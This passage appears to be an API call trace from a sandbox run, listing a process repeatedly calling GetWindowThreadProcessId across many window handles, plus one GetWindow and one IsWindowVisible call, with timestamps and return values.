	[0849.923] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x778
	[0849.923] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x778
	[0849.924] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.924] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.924] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.924] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.924] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.924] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.924] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.924] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.925] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x460
	[0849.925] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.925] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.925] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x23a8
	[0849.925] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1f24
	[0849.925] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x21ec
	[0849.925] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x2320
	[0849.925] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1fd4
	[0849.926] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1880
	[0849.926] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b18
	[0849.926] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1d6c
	[0849.926] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x233c
	[0849.926] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x2368
	[0849.926] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x2124
	[0849.926] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x22f0
	[0849.926] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x22ac
	[0849.927] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1cdc
	[0849.927] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x10f0
	[0849.927] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1f18
	[0849.927] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x20a8
	[0849.927] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x2004
	[0849.927] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1f88
	[0849.927] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1f84
	[0849.928] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x2050
	[0849.928] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1e04
	[0849.928] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1ecc
	[0849.928] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1e64
	[0849.928] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b58
	[0849.928] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1e94
	[0849.928] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1e28
	[0849.929] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1df8
	[0849.929] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1da8
	[0849.929] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1c70
	[0849.929] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x163c
	[0849.929] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1a10
	[0849.929] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x186c
	[0849.929] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1d74
	[0849.929] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4c8
	[0849.930] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1960
	[0849.930] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1ce4
	[0849.930] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b24
	[0849.930] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x14e0
	[0849.930] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x17f0
	[0849.930] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x854
	[0849.930] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1268
	[0849.930] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1624
	[0849.930] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b9c
	[0849.931] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x16f4
	[0849.931] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x145c
	[0849.931] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x17d0
	[0849.931] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1d28
	[0849.931] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xcb8
	[0849.931] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1190
	[0849.931] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x3a8
	[0849.932] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1bd0
	[0849.932] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1bfc
	[0849.932] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1a78
	[0849.932] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b90
	[0849.932] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b04
	[0849.932] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b34
	[0849.932] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b64
	[0849.932] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1bb0
	[0849.933] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1acc
	[0849.933] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1a2c
	[0849.933] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x19a8
	[0849.933] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1944
	[0849.933] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x18c8
	[0849.933] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x18ac
	[0849.933] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x18ec
	[0849.933] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1898
	[0849.934] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc98
	[0849.934] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x153c
	[0849.934] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1808
	[0849.934] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x12a4
	[0849.934] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1740
	[0849.934] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x16c4
	[0849.934] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1820
	[0849.934] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x16ac
	[0849.935] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1858
	[0849.935] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1664
	[0849.935] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x10b4
	[0849.935] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x10ac
	[0849.935] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x10ec
	[0849.935] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1068
	[0849.935] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x17e0
	[0849.935] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x102c
	[0849.936] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x17a4
	[0849.936] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1050
	[0849.936] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1694
	[0849.936] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1770
	[0849.936] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1720
	[0849.936] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x165c
	[0849.936] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1578
	[0849.936] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x16c0
	[0849.937] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x161c
	[0849.937] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1638
	[0849.937] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x15c8
	[0849.937] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1554
	[0849.937] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1674
	[0849.937] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1520
	[0849.937] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x14bc
	[0849.937] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xf8c
	[0849.938] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe9c
	[0849.938] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1434
	[0849.938] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x14ec
	[0849.938] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xfcc
	[0849.938] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x12ac
	[0849.939] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1484
	[0849.939] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x934
	[0849.939] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc0c
	[0849.939] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb08
	[0849.939] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x948
	[0849.939] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1178
	[0849.939] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x13e0
	[0849.939] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xcd0
	[0849.940] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x13fc
	[0849.940] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xdc8
	[0849.940] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc18
	[0849.940] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc2c
	[0849.940] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa1c
	[0849.940] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1244
	[0849.940] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xdb0
	[0849.940] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1398
	[0849.941] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1358
	[0849.941] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1370
	[0849.941] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1340
	[0849.941] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x130c
	[0849.941] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x12c0
	[0849.941] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x12e4
	[0849.941] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1270
	[0849.941] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1298
	[0849.942] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x120c
	[0849.942] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x122c
	[0849.942] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x11c4
	[0849.942] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x11b0
	[0849.942] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1188
	[0849.942] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1148
	[0849.942] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1160
	[0849.943] GetWindow (hWnd=0x202e6, uCmd=0x4) returned 0x0
	[0849.943] IsWindowVisible (hWnd=0x202e6) returned 0
	[0849.943] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x10fc
	[0849.943] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe34
	[0849.943] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xea4
	[0849.943] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x514
	[0849.944] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe48
	[0849.944] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xbc8
	[0849.944] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xdf8
	[0849.944] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x318
	[0849.944] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xcac
	[0849.944] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x8bc
	[0849.944] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xf9c
	[0849.944] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xf48
	[0849.945] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe40
	[0849.945] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xecc
	[0849.945] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xeb8
	[0849.945] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe80
	[0849.945] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe98
	[0849.945] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe60
	[0849.945] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xee4
	[0849.945] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xf00
	[0849.946] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xdf0
	[0849.946] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe1c
	[0849.946] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xdd0
	[0849.946] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xd94
	[0849.946] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xd74
	[0849.946] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xd00
	[0849.946] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xcd8
	[0849.946] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc84
	[0849.947] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xca4
	[0849.947] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc64
	[0849.947] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc24
	[0849.947] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb84
	[0849.947] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xbac
	[0849.947] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x384
	[0849.947] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xab8
	[0849.947] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x33c
	[0849.948] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa44
	[0849.948] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa64
	[0849.948] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x8a8
	[0849.948] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xaf0
	[0849.948] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x88c
	[0849.948] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb04
	[0849.948] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x910
	[0849.948] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x230
	[0849.949] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xac0
	[0849.949] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xab4
	[0849.949] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xaac
	[0849.949] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x3d0
	[0849.949] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x978
	[0849.949] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa7c
	[0849.949] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x59c
	[0849.949] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa88
	[0849.950] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa6c
	[0849.950] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa68
	[0849.950] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x9f8
	[0849.950] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa04
	[0849.950] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x924
	[0849.950] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x8dc
